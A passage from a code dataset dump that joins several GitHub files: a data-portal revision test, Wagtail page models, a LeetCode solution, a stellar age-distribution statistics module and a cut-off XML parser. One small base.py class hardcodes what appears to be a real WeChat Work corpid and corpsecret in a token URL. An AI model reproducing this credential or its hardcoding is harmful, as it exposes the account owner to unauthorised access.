self.get_schema_with_retries(dataset_id).json()\n\n # Start a revision\n res = self.session.post(f\"{self.api}/dp/v1/collections/{canonical_collection_id}\", headers=headers)\n self.assertStatusCode(201, res)\n data = json.loads(res.content)\n revision_id = data[\"id\"]\n\n with self.subTest(\"Test updating a dataset in a revision does not effect the published dataset\"):\n private_dataset_id = res.json()[\"datasets\"][0][\"id\"]\n\n meta_payload_res = self.session.get(f\"{self.api}/dp/v1/datasets/meta?url={explorer_url}\")\n meta_payload_res.raise_for_status()\n meta_payload = meta_payload_res.json()\n\n self.assertDictEqual(meta_payload_before_revision, meta_payload)\n\n # Upload a new dataset\n self.upload_and_wait(\n revision_id,\n dataset_2_dropbox_url,\n existing_dataset_id=private_dataset_id,\n )\n\n # Check that the published dataset is still the same\n meta_payload_after_revision = self.session.get(f\"{self.api}/dp/v1/datasets/meta?url={explorer_url}\").json()\n self.assertDictEqual(meta_payload_before_revision, meta_payload_after_revision)\n schema_after_revision = self.get_schema_with_retries(dataset_id).json()\n self.assertDictEqual(schema_before_revision, schema_after_revision)\n\n with self.subTest(\"Publishing a revised dataset replaces the original dataset\"):\n # Publish the revision\n body = {\"data_submission_policy_version\": \"1.0\"}\n res = self.session.post(\n f\"{self.api}/dp/v1/collections/{revision_id}/publish\", headers=headers, data=json.dumps(body)\n )\n res.raise_for_status()\n self.assertStatusCode(requests.codes.accepted, res)\n\n dataset_meta_payload = self.session.get(f\"{self.api}/dp/v1/datasets/meta?url={explorer_url}\").json()\n self.assertTrue(\n dataset_meta_payload[\"s3_uri\"].startswith(f\"s3://hosted-cellxgene-{os.environ['DEPLOYMENT_STAGE']}/\")\n )\n self.assertTrue(dataset_meta_payload[\"s3_uri\"].endswith(\".cxg/\"))\n 
self.assertIn(\n dataset_meta_payload[\"dataset_id\"],\n dataset_meta_payload[\"s3_uri\"],\n \"The id of the S3_URI should be the revised dataset id.\",\n )\n\n # TODO: add `And the explorer url redirects appropriately`\n\n # Start a new revision\n res = self.session.post(f\"{self.api}/dp/v1/collections/{canonical_collection_id}\", headers=headers)\n self.assertStatusCode(201, res)\n revision_id = res.json()[\"id\"]\n\n # Get datasets for the collection (before uploading)\n public_datasets_before = self.session.get(f\"{self.api}/dp/v1/collections/{canonical_collection_id}\").json()[\n \"datasets\"\n ]\n\n # Upload a new dataset\n another_dataset_id = self.upload_and_wait(revision_id, dataset_1_dropbox_url)\n\n with self.subTest(\"Adding a dataset to a revision does not impact public datasets in that collection\"):\n # Get datasets for the collection (after uploading)\n public_datasets_after = self.session.get(f\"{self.api}/dp/v1/collections/{canonical_collection_id}\").json()[\n \"datasets\"\n ]\n self.assertCountEqual(public_datasets_before, public_datasets_after)\n\n # Publish the revision\n body = {\"data_submission_policy_version\": \"1.0\"}\n res = self.session.post(\n f\"{self.api}/dp/v1/collections/{revision_id}/publish\", headers=headers, data=json.dumps(body)\n )\n res.raise_for_status()\n self.assertStatusCode(requests.codes.accepted, res)\n\n with self.subTest(\n \"Publishing a revision that contains a new dataset updates \"\n \"the collection page for the data portal (with the new dataset)\"\n ):\n # Check if the last updated dataset_id is among the public datasets\n public_datasets = self.session.get(f\"{self.api}/dp/v1/collections/{canonical_collection_id}\").json()[\n \"datasets\"\n ]\n self.assertEqual(len(public_datasets), 2)\n ids = [dataset[\"id\"] for dataset in public_datasets]\n self.assertIn(another_dataset_id, ids)\n\n # Start a revision\n res = self.session.post(f\"{self.api}/dp/v1/collections/{canonical_collection_id}\", headers=headers)\n self.assertStatusCode(201, res)\n revision_id = res.json()[\"id\"]\n\n # This only works if you pick the non-replaced dataset.\n dataset_to_delete = res.json()[\"datasets\"][1]\n revision_deleted_dataset_id = dataset_to_delete[\"id\"]\n published_explorer_url = self.create_explorer_url(revision_deleted_dataset_id)\n\n # Delete (tombstone) a dataset (using admin privileges) within the revision\n revision_datasets = self.session.get(f\"{self.api}/curation/v1/collections/{revision_id}\").json()[\"datasets\"]\n dataset_id_to_delete = None\n for dataset in revision_datasets:\n if dataset[\"dataset_version_id\"] == revision_deleted_dataset_id:\n dataset_id_to_delete = dataset[\"dataset_id\"]\n\n curation_api_headers = {\"Authorization\": f\"Bearer {self.curation_api_access_token}\"}\n res = self.session.delete(\n f\"{self.api}/curation/v1/collections/{revision_id}/datasets/{dataset_id_to_delete}?delete_published=true\",\n headers=curation_api_headers,\n )\n self.assertStatusCode(202, res)\n\n with self.subTest(\"Deleting a dataset does not affect the published dataset\"):\n # Check if the dataset is still available\n res = self.session.get(f\"{self.api}/dp/v1/datasets/meta?url={published_explorer_url}\")\n self.assertStatusCode(200, res)\n\n # Endpoint is eventually consistent\n res = self.get_schema_with_retries(revision_deleted_dataset_id)\n self.assertStatusCode(200, res)\n\n with self.subTest(\"Publishing a revision that deletes a dataset removes it from the data portal\"):\n # Publish the revision\n body = 
{\"data_submission_policy_version\": \"1.0\"}\n res = self.session.post(\n f\"{self.api}/dp/v1/collections/{revision_id}/publish\", headers=headers, data=json.dumps(body)\n )\n res.raise_for_status()\n self.assertStatusCode(requests.codes.accepted, res)\n\n # Check that the dataset doesn't exist anymore\n res = self.session.get(f\"{self.api}/dp/v1/collections/{collection_id}\", headers=headers)\n res.raise_for_status()\n datasets = [dataset[\"id\"] for dataset in res.json()[\"datasets\"]]\n self.assertEqual(1, len(datasets))\n self.assertNotIn(revision_deleted_dataset_id, datasets)\n\n def get_schema_with_retries(self, dataset_id, desired_http_status_code=requests.codes.ok):\n @retry(wait=wait_fixed(1), stop=stop_after_attempt(50))\n def get_s3_uri():\n s3_uri_res = self.session.get(\n f\"{self.api}/cellxgene/e/{dataset_id}.cxg/api/v0.3/s3_uri\", allow_redirects=False\n )\n assert s3_uri_res.status_code == desired_http_status_code\n return s3_uri_res\n\n @retry(wait=wait_fixed(1), stop=stop_after_attempt(50))\n def get_schema(s3_uri_response_object):\n # parse s3_uri_response_object content\n s3_path = s3_uri_response_object.content.decode(\"utf-8\").strip().strip('\"')\n # s3_uri endpoints use double-encoded s3 uri path parameters\n s3_path_url = quote(quote(s3_path, safe=\"\"))\n schema_res = self.session.get(\n f\"{self.api}/cellxgene/s3_uri/{s3_path_url}/api/v0.3/schema\", allow_redirects=False\n )\n assert schema_res.status_code == requests.codes.ok\n return schema_res\n\n s3_uri_response = get_s3_uri()\n return get_schema(s3_uri_response)\n","repo_name":"chanzuckerberg/single-cell-data-portal","sub_path":"tests/functional/backend/corpora/test_revisions.py","file_name":"test_revisions.py","file_ext":"py","file_size_in_byte":11621,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"35"} +{"seq_id":"75175458660","text":"from django.db import models\n\nfrom wagtail.contrib.settings.models import BaseSetting, register_setting\nfrom wagtail.images.models import Image\n\nfrom wagtail.core.models import Page\nfrom modelcluster.fields import ParentalKey\nfrom wagtail.admin.edit_handlers import (\n FieldPanel, FieldRowPanel,\n InlinePanel, MultiFieldPanel\n)\nfrom wagtail.contrib.forms.edit_handlers import FormSubmissionsPanel\nfrom wagtail.images.edit_handlers import ImageChooserPanel\n\nfrom wagtail.core.fields import RichTextField\nfrom wagtail.contrib.forms.models import AbstractEmailForm, AbstractFormField\n\n\n@register_setting\nclass SiteSettings(BaseSetting):\n logo = models.OneToOneField(Image, null=True, blank=True,\n on_delete=models.SET_NULL, related_name='+', verbose_name='Business logo')\n panels = [\n ImageChooserPanel('logo'),\n ]\n\n\nclass HomePage(Page):\n body = RichTextField(blank=True)\n\n image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+',\n )\n\n content_panels = Page.content_panels + [\n ImageChooserPanel('image'),\n FieldPanel('body', classname=\"full\"),\n ]\n\n\nclass SubscribeField(AbstractFormField):\n page = ParentalKey('SubscribePage', on_delete=models.CASCADE,\n related_name='form_fields')\n\n\nclass SubscribePage(AbstractEmailForm):\n intro = RichTextField(blank=True)\n thank_you_text = RichTextField(blank=True)\n image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+',\n )\n\n content_panels = AbstractEmailForm.content_panels + [\n FormSubmissionsPanel(),\n 
ImageChooserPanel('image'),\n FieldPanel('intro', classname=\"full\"),\n InlinePanel('form_fields', label=\"Subscribe fields\"),\n FieldPanel('thank_you_text', classname=\"full\"),\n MultiFieldPanel([\n FieldRowPanel([\n FieldPanel('from_address', classname=\"col6\"),\n FieldPanel('to_address', classname=\"col6\"),\n ]),\n FieldPanel('subject'),\n ], \"Email\"),\n ]\n","repo_name":"firesidewing/HahnEngineering","sub_path":"home/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}{"seq_id":"34248652974","text":"#!/usr/bin/env python\n# _*_ coding: utf-8 _*_\n# @Time : 2021/2/28 11:37\n# @Author : liujianxiao\n# @Version:V 0.1\n# @File : base.py\n# @desc : parent class\nimport requests\n\n\nclass Base():\n def __init__(self):\n self.request_session = requests.session()\n url = f\"https://qyapi.weixin.qq.com/cgi-bin/gettoken?corpid=ww82b74853d3f08580&corpsecret=ws13zUNeO5HbzWdZFHzd10tN6odXac_1iDyVQ2tTyMM\"\n result = requests.get(url)\n token = result.json()[\"access_token\"]\n print(\"token:\",token)\n self.request_session.params ={'access_token':token}\n\n def send(self,*args,**kwargs):\n return self.request_session.request(*args,**kwargs)\n","repo_name":"liujianxiao27/Homework","sub_path":"requestTwo/myFrame/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}{"seq_id":"971959550","text":"'''\r\nLab16\r\nName: 977. Squares of a Sorted Array\r\nhttps://leetcode.com/problems/squares-of-a-sorted-array/\r\n'''\r\n\r\n\r\nclass Solution:\r\n def sortedSquares(self, nums: List[int]) -> List[int]:\r\n\r\n L, R, res = 0, len(nums) - 1, []\r\n while L <= R:\r\n if abs(nums[L]) >= abs(nums[R]):\r\n res.append(nums[L] ** 2)\r\n L += 1\r\n else:\r\n res.append(nums[R] ** 2)\r\n R -= 1\r\n return res[::-1]\r\n","repo_name":"Flanker35B/leetcode","sub_path":"lab2/lab16_Squares of a Sorted Array.py","file_name":"lab16_Squares of a Sorted Array.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}{"seq_id":"32672062918","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 24 14:19:27 2018\n\n@author: christian\n\"\"\"\n\nimport h5py\nimport pandas as pd\nimport numpy as np\nfrom scipy.stats import norm\nfrom scipy.optimize import newton\nfrom scipy.linalg import block_diag\n\n\ndef smooth_gfunc2d(g):\n '''\n Smooth a 2D G function.\n\n Parameters\n ----------\n g : array\n 2D G function.\n\n Returns\n -------\n g2 : array\n Smoothed 2D G function.\n '''\n\n kernel = np.array([0.25, 0.5, 0.25])\n func = lambda x: np.convolve(x, kernel, mode='same')\n g1 = np.apply_along_axis(func, 0, g)\n g2 = np.apply_along_axis(func, 1, g1)\n\n return g2\n\n\ndef norm_gfunc(g, method='maxone'):\n '''\n Normalise G function.\n\n Parameters\n ----------\n g : array\n 1D/2D G function.\n\n method : str, optional\n Normalisation method.\n Default is 'maxone' which scales the max value to one.\n\n Returns\n -------\n gnorm : array\n Normalised G function.\n '''\n\n gmax = np.amax(g)\n if method == 'maxone':\n if gmax == 0:\n gnorm = np.ones_like(g)\n else:\n gnorm = g / np.amax(g)\n elif method == 'sumone':\n if gmax == 0:\n gnorm = np.ones_like(g) / np.size(g)\n else:\n gnorm = g / np.sum(g)\n# elif method == 'some other method':\n# gnorm = ...\n else:\n raise 
ValueError('Unknown normalization method')\n\n return gnorm\n\n\ndef gfunc_age(g, norm=True, norm_method='maxone'):\n '''\n Get the 1D age G function from the 2D G function.\n\n Parameters\n ----------\n g : array\n 1D/2D G function.\n\n norm : bool, optional\n Normalise the G function before returning.\n Default value is True.\n\n norm_method : str, optional\n Normalisation method to use if `norm=True`.\n Default is 'maxone'.\n\n Returns\n -------\n g_age : array\n 1D age G function.\n '''\n\n g_age = np.sum(g, axis=1)\n if norm:\n g_age = norm_gfunc(g_age, norm_method)\n\n return g_age\n\n\ndef gfunc_age_quantile(g_age, age_grid, q):\n '''\n Get the q'th quantile of the 1D age G function\n interpolated onto the age grid.\n (q = 0.5 gives the median age)\n\n Parameters\n ----------\n g_age : array\n 1D age G function.\n\n age_grid: array\n The age values on which `g_age` is defined.\n Must be same length as g_age.\n\n q : float\n Quantile to compute, which must be between 0 and 1.\n\n Returns\n -------\n age_q : float\n Age quantile.\n '''\n\n g_age_cumsum = np.cumsum(g_age)\n g_age_cumsum /= g_age_cumsum[-1]\n age_q_ind = np.argmin((np.abs(g_age_cumsum-q)))\n age_q = age_grid[age_q_ind]\n\n return age_q\n\n\ndef gfunc_age_mode(g_age, age_grid, use_median=False):\n '''\n Get the mode or median of a 1D age G function.\n\n Parameters\n ----------\n g_age : array\n 1D age G function.\n\n age_grid: array\n The age values on which `g_age` is defined.\n Must be same length as g_age.\n\n use_median : bool, optional\n Use median instead of mode if True.\n Default is False.\n\n Returns\n -------\n age_mode : float\n Mode (or median) of the 1D age G function.\n '''\n\n if use_median:\n age_mode = gfunc_age_quantile(g_age, age_grid, 0.5)\n else:\n ind = np.argmax(g_age)\n age_mode = age_grid[ind]\n\n return age_mode\n\n\ndef conf_glim(conf_level):\n '''\n Get the limiting value of a 1D age G function corresponding\n to a certain age confidence level.\n This is calculated assuming that the G function can be approximated\n by a Gaussian.\n\n Parameters\n ----------\n conf_level : float\n Confidence level as a fraction (between 0 and 1).\n\n Returns\n -------\n glim : float\n Limit on the G function setting the confidence limits.\n '''\n\n assert conf_level > 0 and conf_level < 1\n\n zero_func = lambda x: 2*norm.cdf(np.sqrt(-2*np.log(x))) - 1 - conf_level\n glim = newton(zero_func, 0.6)\n\n return glim\n\n\ndef gfunc_age_conf(g_age, age_grid, conf_level=0.68, use_median=False):\n '''\n Get the confidence interval of the age from a 1D G function.\n\n Parameters\n ----------\n g_age : array\n 1D age G function.\n\n age_grid : array\n The age values on which `g_age` is defined.\n Must be same length as g_age.\n\n conf_level : float\n Confidence level as a fraction (between 0 and 1).\n Default value is 0.68 corresponding to 1 sigma for a Gaussian.\n\n Returns\n -------\n age_conf : tuple\n Lower and upper limit on the confidence interval of the age.\n None is returned if no limit exists (the G function does not fall\n below the critical value given by the confidence level before\n hitting the edge of the age_grid).\n '''\n\n if use_median:\n age_low = gfunc_age_quantile(g_age, age_grid, 0.5-conf_level/2)\n age_high = gfunc_age_quantile(g_age, age_grid, 0.5+conf_level/2)\n else:\n glim = conf_glim(conf_level)\n ages_lim = age_grid[g_age > glim]\n age_low, age_high = ages_lim[0], ages_lim[-1]\n\n if age_low == age_grid[0]:\n age_low = None\n if age_high == age_grid[-1]:\n age_high = None\n age_conf = (age_low, 
age_high)\n\n return age_conf\n\n\ndef age_mode_and_conf(g_age, age_grid, conf_levels=[0.68, 0.90],\n use_median=False):\n '''\n Get the mode (or median) and confidence interval for a 1D age G function\n with a number of confidence intervals.\n\n Parameters\n ----------\n g_age : array\n 1D age G function.\n\n age_grid : array\n The age values on which `g_age` is defined.\n Must be same length as g_age.\n\n conf_levels : list of float\n Confidence levels as fractions (between 0 and 1).\n Default value is [0.68, 0.90].\n\n use_median : bool, optional\n Use median instead of mode if True.\n Default is False.\n\n Returns\n -------\n age_arr : array\n List of length 1+2*len(`conf_levels`). The middle entry is\n the age mode (or median), and the surrounding values are the\n confidence interval.\n For example with conf_levels=[0.68, 0.90] it returns the list\n [5%, 16%, mode, 84%, 95%].\n '''\n\n n = len(conf_levels)\n age_arr = np.zeros(1+2*n)\n\n age_arr[n] = gfunc_age_mode(g_age, age_grid, use_median)\n for i in range(1, n+1):\n try:\n age_arr[n-i:n+i+1:2*i] = gfunc_age_conf(g_age, age_grid,\n conf_level=conf_levels[i-1],\n use_median=use_median)\n except:\n age_arr[:] = None\n break\n\n return age_arr\n\n\ndef print_age_stats(output_h5, filename, smooth=False, use_median=False):\n '''\n Function for printing ages and confidence intervals to a text file\n based on an output hdf5 file (containing the 2D G functions).\n The age statistics which are printed are the mode of the G function as\n well as the 68 and 90% confidence intervals (this can be changed in\n the source code).\n\n Parameters\n ----------\n output_h5 : str\n Path to the output hdf5 file.\n\n filename : str\n Name of the text file with the age output.\n\n smooth : bool\n If True, smooth the G functions before calculating the ages and\n confidence intervals.\n Note: This only applies to 2D G functions, if the G functions in\n output_h5 are 1D, nothing happens.\n Default value is False.\n\n use_median : bool, optional\n Use median of G function instead of mode if True.\n Default is False.\n '''\n\n with h5py.File(output_h5, 'r') as out:\n ages = out['grid/tau'][:]\n gf_group = out['gfuncs']\n if len(gf_group) == 1:\n star_id = np.array([star for star in gf_group])\n else:\n star_id = np.array(gf_group)\n try:\n star_id_sort = np.argsort([int(x) for x in star_id])\n star_id = star_id[star_id_sort]\n except ValueError:\n print('star_id not sorted in '+filename)\n\n n_star = len(star_id)\n age_arr = np.zeros((n_star, 5))\n for i, star in enumerate(star_id):\n g = gf_group[star][:]\n gdim = g.ndim\n if gdim == 2:\n if smooth:\n g = smooth_gfunc2d(g)\n g_age = gfunc_age(g)\n else:\n g_age = g\n g_age = norm_gfunc(g_age)\n age_arr[i] = age_mode_and_conf(g_age, ages, use_median=use_median)\n\n # Pad identifier strings (for prettier output)\n id_len = max((10, max([len(x) for x in star_id])))\n star_id_pad = [x.ljust(id_len) for x in star_id]\n\n # Combine identifiers and data in DataFrame and write to txt\n pd_arr = pd.DataFrame(age_arr, index=star_id_pad)\n astr = 'aMedian' if use_median else 'aMode'\n pd_arr.to_csv(filename, sep='\\t', index_label='#IDnumber',\n header=['a5', 'a16', astr, 'a84', 'a95'],\n float_format='%2.2f', na_rep='nan')\n\n\ndef estimate_samd(gfunc_files, case='1D', betas=None, alpha=0, stars=None,\n grid_slice=None, grid_thin=None, max_iter=10, min_tol=1.e-20):\n '''\n Function for estimating the sample age metallicity distribution (samd) OR\n simply the sample age distribution (sad).\n\n This uses a Newton-Raphson 
minimisation to find the function phi which\n maximises the likelihood L(phi) = sum(L_i(phi)), where\n L_i(phi) = int(G_i(theta)*phi(theta)),\n and G_i are the G functions and theta is either the age (in the 1D case)\n or both the age and metallicity (in the 2D case).\n\n Parameters\n ----------\n gfunc_files : list\n List of paths to the output hdf5 files containing the 2D G functions.\n If more than one, the output in the different files MUST be defined on\n the same age/metallicity grids.\n\n case : str, optional\n Determines whether the 2D (samd) or 1D (sad) is calculated.\n '2D' for samd and '1D' for sad. Default is '1D'.\n\n betas : tuple, optional\n Beta is a regularization parameter which regulates how strongly the\n solution favors a flat (constant) function (0 is most strict, higher\n numbers are less strict).\n betas should be a tuple containing the three floats beta, dbeta, and\n beta_max. beta is the initial value, dbeta is the step, and beta_max is\n the maximum value which, if hit, stops the computation.\n beta (the initial value) should be close to 0 and dbeta not too large\n to allow a gentle convergence towards a sensible solution.\n Default is None in which case the values (0.01, 0.01, 1.00) are used.\n\n alpha : int, optional\n Value of the smoothing parameter. Higher values will favor solutions\n with smaller point-to-point variations (first derivatives).\n Not implemented properly in the '2D' case.\n Default value is 0.\n\n stars : list of str, optional\n List of star identifiers (as used in the gfunc_files) to be included in\n the calculation.\n Default is None in which case all stars are included.\n\n grid_slice : tuple of ints, optional\n Grid slice indices. If specified, it must be a tuple of four integers,\n and only the ages from grid_slice[0] to grid_slice[1] and the\n metallicities from grid_slice[2] to grid_slice[3] are considered.\n This increases performance by decreasing the size of the problem.\n Default value is None in which case all grid points are considered.\n Note that if gfunctions are saved as 1D, only the first two integers\n are used (it is too late to thin in metallicity).\n\n grid_thin : tuple of ints, optional\n Thinning factor. If specified, it must be a tuple of two integers, and\n only every `grid_thin[0]`th age and every `grid_thin[1]`th metallicity\n grid point is considered. This increases performance by decreasing the\n size of the problem.\n This thinning is performed after slicing with grid_slice.\n Default is None in which case all grid points (in the grid_slice\n selection) are considered.\n\n max_iter : int, optional\n Maximum number of Newton-Raphson iterations per beta.\n Default value is 10\n\n min_tol : float, optional\n Minimum value that the samd/sad is allowed to reach.\n Default value is 1e-20.\n\n Returns\n -------\n samd : list\n List of samd/sad with one entry for each value of beta.\n\n Q : list\n List of same length as `samd`. Each entry is a list giving the values of\n beta, the negative log-likelihood of the solution, its entropy, and the\n regularization term.\n\n tau_grid : array\n Age grid on which the input G functions were defined (taken from one of\n the `gfunc_files`).\n\n feh_grid : array\n Metallicity grid on which the input G functions were defined (taken\n from one of the `gfunc_files`).\n '''
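\n # A hypothetical call (the file name here is made up) might look like:\n # samd, Q, tau, feh = estimate_samd(['gfuncs_out.h5'], case='1D',\n # betas=(0.01, 0.01, 1.0), grid_thin=(2, 1))\n # sad = samd[-1] # sample age distribution at the final (largest) beta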
\n # Load data\n g2d = []\n tau_grid, feh_grid = None, None\n for i, gfunc_file in enumerate(gfunc_files):\n # Allow for stars to be a list of lists (one for each gfunc-file)\n if stars is not None and isinstance(stars[0], list):\n stars_i = stars[i]\n elif stars is not None:\n stars_i = stars\n with h5py.File(gfunc_file, 'r') as gfile:\n saved_2d = gfile['header/save2d'][()].decode('ascii') == 'True'\n if not saved_2d and case == '2D':\n raise ValueError('Need 2D functions in output for case=\"2D\"')\n if tau_grid is not None and feh_grid is not None:\n tau_grid_new = gfile['grid/tau'][:]\n feh_grid_new = gfile['grid/feh'][:]\n if not (np.array_equal(tau_grid, tau_grid_new)\\\n and np.array_equal(feh_grid, feh_grid_new)):\n raise ValueError('All g-functions must be defined on ' +\\\n 'the same age/metallicity grid!')\n else:\n tau_grid = gfile['grid/tau'][:]\n feh_grid = gfile['grid/feh'][:]\n for starid in gfile['gfuncs']:\n if stars is None or starid in stars_i:\n gfunc = gfile['gfuncs/' + starid][:]\n # Make gfunc more coarse (optionally, increases performance)\n if grid_slice is not None:\n if saved_2d:\n gfunc = gfunc[grid_slice[0]:grid_slice[1],\n grid_slice[2]:grid_slice[3]]\n else:\n gfunc = gfunc[grid_slice[0]:grid_slice[1]]\n\n if grid_thin is not None:\n if saved_2d:\n gfunc = gfunc[::grid_thin[0], ::grid_thin[1]]\n else:\n gfunc = gfunc[::grid_thin[0]]\n #gfunc = smooth_gfunc2d(gfunc)\n gfunc = norm_gfunc(gfunc)\n g2d.append(gfunc)\n\n g2d = np.array(g2d)\n\n # Make grid more coarse (optionally, increases performance)\n if grid_slice is not None:\n tau_grid = tau_grid[grid_slice[0]:grid_slice[1]]\n feh_grid = feh_grid[grid_slice[2]:grid_slice[3]]\n if grid_thin is not None:\n tau_grid = tau_grid[::grid_thin[0]]\n feh_grid = feh_grid[::grid_thin[1]]\n\n # Number of tau/feh-values and number of stars\n l = len(feh_grid)\n m = len(tau_grid)\n n = g2d.shape[0]\n\n # Define matrix with n g-functions\n # (in 2D case each g-function is flattened first)\n if case == '1D':\n if saved_2d:\n g = np.sum(g2d, axis=2)\n else:\n g = g2d\n k = m\n elif case == '2D':\n k = m*l\n # reshape with \"age-order\" (each row is a sequence of functions\n # like in the '1D' case)\n g = g2d.reshape(n, k, order='F')\n # add small number to avoid log(0)\n g += 1e-10\n\n #------------------------------------------------\n # Set up for estimating age distribution phi(1:k)\n #------------------------------------------------\n\n # weights for integrals over theta\n w = np.ones(k) / k\n\n # constant prior, normalized\n Phi = np.ones(k)\n Phi /= np.dot(w, Phi)\n\n # initial guess for phi and lambda\n phi = Phi\n lamda = -1 # this gives r_j = 0 for beta = 0\n\n # initial beta and step\n if betas is None:\n beta, dbeta, beta_max = 0.01, 0.01, 1.00\n else:\n beta, dbeta, beta_max = betas\n\n # Gw = G matrix, with each column multiplied by w(j)\n gw = g * w\n
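\n # The T matrices below form a banded second-difference (discrete Laplacian)\n # operator -- tridiagonal in 1D, block-tridiagonal with extra +/-m bands in\n # 2D -- so the 2*alpha*beta term in the objective penalises rough,\n # rapidly varying solutions.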
\n # Derivative matrix\n T = np.diag([-1]+(m-2)*[-2]+[-1])\n T += np.diag((m-1)*[1], k=1)\n T += np.diag((m-1)*[1], k=-1)\n\n if case == '2D':\n T1 = np.diag(np.ones(m)*(-3))\n T1[0][0] = T1[-1][-1] = -2\n T1 += np.diag(np.ones(m-1), k=1)\n T1 += np.diag(np.ones(m-1), k=-1)\n T2 = np.diag(np.ones(m)*(-4))\n T2[0][0] = T2[-1][-1] = -3\n T2 += np.diag(np.ones(m-1), k=1)\n T2 += np.diag(np.ones(m-1), k=-1)\n T_repeat = [T1] + [T2 for i in range(l-2)] + [T1]\n T = block_diag(*T_repeat)\n T += np.diag(np.ones(k-m), k=m)\n T += np.diag(np.ones(k-m), k=-m)\n\n # Tw = T matrix, with each column multiplied by w(j)\n Tw = T * w\n\n # list to hold beta, L, E, R\n Q = []\n # list to hold phi (the age/age-metallicity distribution)\n samd = []\n\n # Perform Newton-Raphson minimisation\n finished = False\n while not finished:\n for iterr in range(max_iter):\n u = np.dot(gw, phi)\n v = np.dot(Tw, phi)\n\n u[u == 0] = 1 # avoid division by zero\n gwu = gw / u[:, np.newaxis]\n Twv = Tw * v[:, np.newaxis]\n\n # residuals\n r = w * (1 + np.log(phi/Phi)) - beta * np.sum(gwu, 0) \\\n + 2*alpha*beta * np.sum(Twv, 0) + lamda * w\n R = np.dot(w, phi) - 1\n\n # Hessian\n H = np.diag(w / phi) + beta * np.dot(gwu.T, gwu) \\\n + 2*alpha*beta * np.dot(Tw.T, Tw)\n\n # full matrix\n M = np.zeros((k+1, k+1))\n M[:k, :k] = H\n M[-1, :k] = M[:k, -1] = w\n h = np.append(-r, -R)\n\n s = np.append(1/np.sqrt(np.diag(H)), 1.)\n S = np.diag(s)\n M1 = np.dot(np.dot(S, M), S)\n h1 = np.dot(S, h)\n\n con = np.linalg.cond(M1)\n if np.isinf(con):\n finished = True\n break\n\n Delta1 = np.linalg.solve(M1, h1)\n Delta = np.dot(S, Delta1)\n\n Delta_phi = Delta[:k]\n Delta_lambda = Delta[-1]\n\n f = 1.\n phi_test = phi + f * Delta_phi\n while min(phi_test) < 0:\n f *= 0.5\n phi_test = phi + f * Delta_phi\n phi = phi_test\n lamda += f * Delta_lambda\n\n phi[phi < min_tol] = min_tol\n if beta >= beta_max:\n finished = True\n break\n\n # re-normalise to avoid exponential growth of rounding errors\n phi /= np.dot(w, phi)\n\n if case == '1D':\n samd.append(phi)\n elif case == '2D':\n samd.append(phi.reshape(m, l, order='F'))\n\n # entropy\n E = np.sum(w * phi * np.log(phi / Phi))\n\n # total negative log-likelihood\n L = -np.sum(np.log(np.dot(gw, phi)))\n\n # total regularization term\n R = np.sum(np.dot(Tw, phi)**2)\n\n # add to list Q\n Q.append([beta, L, E, R])\n\n beta += dbeta\n\n return samd, Q, tau_grid, feh_grid\n","repo_name":"csahlholdt/gfunc2D","sub_path":"gfunc2d/gstats.py","file_name":"gstats.py","file_ext":"py","file_size_in_byte":19836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}{"seq_id":"7668026000","text":"# -*- coding:utf-8 -*-\nimport xml.etree.ElementTree as ET\n\n# reference : https://stackabuse.com/reading-and-writing-xml-files-in-python/\n\ndef parseXml49():\n\tpath = \"../data_set/\"\n\tfile_name = \"CLMS_US_0049\"\n\tinput_name = file_name + \".xml\"\n\toutput_name = file_name + \"_parsed.xml\"\n\n\ttree = ET.parse(path + input_name) # parse the file\n\troot = tree.getroot()\n\n\t# create the file structure\n\tdata = ET.Element('data')\n\n\tfor CLAIMs in root: # tag : CLAIMs\n\t\tfor CLAIM in CLAIMs: # tag : CLAIM\t\n\t\t\tfor PARA in CLAIM: # tag : PARA, CLMSTEP\n\t\t\t\tif 'PARA' not in PARA.tag:\n\t\t\t\t\tbreak\n\t\t\t\t# print(PARA.tag, PARA.text)\n\t\t\t\tfor PTEXT in PARA: # tag : PARA -> PTEXT\n\t\t\t\t\tif 'PTEXT' not in PTEXT.tag:\n\t\t\t\t\t\tbreak\n\t\t\t\t\titem = ET.SubElement(data, 'item')\n\t\t\t\t\tcheckRef = False\n\t\t\t\t\tflag = True\n
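\n\t\t\t\t\t# a PTEXT's children carry its text split around the claim\n\t\t\t\t\t# reference: PDAT1 = text before the CLREF, PDAT2 = text after it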
\n\t\t\t\t\tfor ele in PTEXT: # tag : ele -> PDAT, CLREF, PDAT\n\t\t\t\t\t\tif 'CLREF' in ele.tag :\n\t\t\t\t\t\t\tCLREF = ET.SubElement(item, 'CLREF')\n\t\t\t\t\t\t\tCLREF.set('CLREF',ele.attrib['ID'])\n\t\t\t\t\t\t\tcheckRef = True\n\t\t\t\t\t\tif 'PDAT' in ele.tag :\n\t\t\t\t\t\t\tif(flag) :\n\t\t\t\t\t\t\t\tPDAT1 = ET.SubElement(item, 'PDAT1')\n\t\t\t\t\t\t\t\tPDAT1.text = ele.text\n\t\t\t\t\t\t\t\tflag = False\n\t\t\t\t\t\t\telse : \n\t\t\t\t\t\t\t\tPDAT2 = ET.SubElement(item, 'PDAT2')\n\t\t\t\t\t\t\t\tPDAT2.text = ele.text\n\t\t\t\t\tif checkRef == False:\n\t\t\t\t\t\tdata.remove(item)\n\n\tfilter_file = open(path + output_name, 'wb') # ET.tostring returns bytes, so open in binary mode\n\tmydata = ET.tostring(data)\n\tfilter_file.write(mydata)\n\tfilter_file.close()\n\ndef parseXml59():\n\tpath = \"../data_set/\"\n\tfile_name = \"CLMS_US_0059\"\n\tinput_name = file_name + \".xml\"\n\toutput_name = file_name + \"_parsed.xml\"\n\n\ttree = ET.parse(path + input_name)\n\troot = tree.getroot()\n\n\t# create the file structure\n\tdata = 